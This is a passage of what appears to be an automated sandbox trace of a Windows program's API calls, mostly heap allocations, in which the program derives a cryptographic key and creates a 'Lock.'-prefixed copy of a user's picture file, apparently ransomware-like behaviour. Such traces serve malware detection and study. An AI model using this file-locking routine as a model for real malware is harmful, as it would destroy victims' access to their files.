Size=0x4) returned 0x2e54fb8 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0254.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0254.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0254.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e519b8 [0254.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e519b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0254.797] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0254.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0254.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0254.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0254.798] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f50, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0254.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0254.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0254.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0254.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0254.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0254.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0254.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0254.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0254.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0254.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0254.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0254.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0254.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0254.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0254.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0254.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0254.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0254.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0254.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0254.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0254.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0254.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0254.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0254.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0254.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0254.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.807] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0254.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.808] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0254.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0254.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0254.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0254.808] CryptDestroyHash (hHash=0xa86f50) returned 1 [0254.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0254.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0254.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.810] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Th2s_hnP9cJx5.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\th2s_hnp9cjx5.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0254.810] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.810] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0254.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0254.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0254.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0254.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0254.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0254.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0254.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0254.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0254.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0254.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0254.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0254.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0254.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0254.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0254.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.812] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0254.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0254.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0254.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0254.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0254.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0254.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0254.813] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Th2s_hnP9cJx5.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.th2s_hnp9cjx5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0254.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0254.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0254.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0254.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0254.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0254.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0254.822] PeekMessageW (in: 